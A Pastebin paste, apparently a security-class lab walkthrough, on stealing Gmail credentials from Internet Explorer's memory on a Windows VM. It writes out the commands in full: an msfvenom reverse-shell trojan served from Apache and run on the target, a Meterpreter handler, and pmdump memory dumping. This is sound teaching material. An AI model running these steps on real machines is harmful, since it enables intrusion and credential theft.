API tools faq
paste
Advertisement
SaintDruG

Steal_Creds_From_Memory

SaintDruG
Sep 21st, 2016
143
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.21 KB | None | 0 0
raw download clone embed print report
  1. Stealing Passwords from RAM with Metasploit
  2.  
  3. What You Need
  4.  
  5. A Windows 2008 Server virtual machine (any otner Windows version should be fine too, but it must not have antivirus software running)
  6. A Kali 2 virtual machine
  7. Purpose
  8.  
  9. Using meterpreter commands, we'll dump the memory of Internet Explorer to a file, download it, and steal passwords from it.
  10. There have been various Metasploit scripts to automate this process, but they don't work for long before Metasploit changes make them stop working, so I recommend using this manual process.
  11.  
  12. Starting Apache on your Kali Machine
  13.  
  14. In your Kali 2 machine, in a Terminal window, execute these commands:
  15. ifconfig
  16. service apache2 restart
  17.  
  18. Testing Networking
  19.  
  20. On your Windows machine, open a Web browser and enter the IP address of your Kali machine.
  21. You should see the Apache2 default page, as shown below. If you can't connect, you need to debug your networking before proceeding.
  22.  
  23. I recommend placing both machines into NAT networking mode for this project.
  24.  
  25.  
  26.  
  27. Logging in to Gmail
  28.  
  29. On your Windows machine, in Internet Explorer, open gmail.com and attempt to log in with these credentials, replacing "YOURNAME" with your own name:
  30. [email protected]
  31. SECRET_PASSWORD_YOURNAME
  32.  
  33.  
  34. Click the "Sign in" button. Gmail won't let you in, but that doesn't matter for our purposes. The important thing for this project is that Internet Explorer placed your credentials into RAM.
  35.  
  36. Creating a Trojan
  37.  
  38. In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.
  39. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.130 -f exe > fun.exe
  40. cp fun.exe /var/www/html
  41.  
  42.  
  43.  
  44. Downloading pmdump
  45.  
  46. We'll use a really old tool--pmdump, from 2002. It still works!
  47. In your Kali 2 machine, in a Terminal window, execute these commands:
  48.  
  49. curl http://ntsecurity.nu/downloads/pmdump.exe > pmdump.exe
  50. file pmdump.exe
  51.  
  52. cp pmdump.exe /tmp
  53.  
  54. Starting a Meterpreter Handler
  55.  
  56. In your Kali 2 machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali machine.
  57. msfconsole
  58. use multi/handler
  59.  
  60. set PAYLOAD windows/meterpreter/reverse_tcp
  61.  
  62. show options
  63.  
  64. set LHOST 192.168.119.130
  65.  
  66. exploit
  67.  
  68. The payload handler waits, listening, as shown below.
  69.  
  70.  
  71. Downloading and Executing the Malicious Executable
  72.  
  73. On your Windows target machine, in a Web browser, enter this URL, replacing the IP address with the IP address of your Kali machine.
  74. http://192.168.119.130/fun.exe
  75. Run the file, as shown below.
  76.  
  77.  
  78. Uploading pmdump to the Target
  79.  
  80. On your Kali machine, a Meterpreter session should be open, as shown below.
  81. At the meterpreter prompt, execute these commands:
  82.  
  83. cd %TEMP%
  84. pwd
  85.  
  86. upload /tmp/pmdump.exe %TEMP%
  87.  
  88.  
  89. At the meterpreter prompt, execute these commands:
  90.  
  91. shell
  92. dir
  93.  
  94. You should see the pmdump.exe file, as shown below.
  95.  
  96.  
  97. Execute these commands to see how pmdump works, and list the processes on the target system.
  98.  
  99. pmdump.exe
  100. pmdump.exe -list
  101.  
  102.  
  103.  
  104. Find "iexplore.exe" in the list, and notice its Process ID number, as shown below.
  105.  
  106. Execute these commands, replacing "1728" with the correct process ID of "iexplore.exe":
  107.  
  108. pmdump.exe 1728 ie.mem
  109. dir
  110.  
  111. As shown below, the RAM used by Internet Explorer is now in a file named ie.mem. This file is approximately 95 MB in size.
  112.  
  113.  
  114. Execute these commands to return to the Meterpreter shell and start downloading the "ie.mem" file:
  115.  
  116. exit
  117. download ie.mem /tmp
  118.  
  119. The download starts, but doesn't finish right away, as shown below.
  120.  
  121.  
  122. To see the progress of the download, open a new Terminal window and execute these commands:
  123.  
  124. cd /tmp
  125. watch "ls -l ie.mem"
  126.  
  127. You can see the file increasing in size, as shown below.
  128.  
  129.  
  130. When it's done, you'll see a "download" message and a new "meterpreter" prompt in the window showing the Meterpreter session:
  131.  
  132.  
  133. In the Terminal window showing the "watch" results, press
  134.  
  135. Ctrl+C to stop "watch".
  136.  
  137. Execute this command to search for login credentials in the RAM file:
  138.  
  139. strings ie.mem | grep "@gmail.com"
  140. Your username and password should be easy to find. Highlight them
  141.  
  142. Make sure your username and password are visible and highlighted, as shown above.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!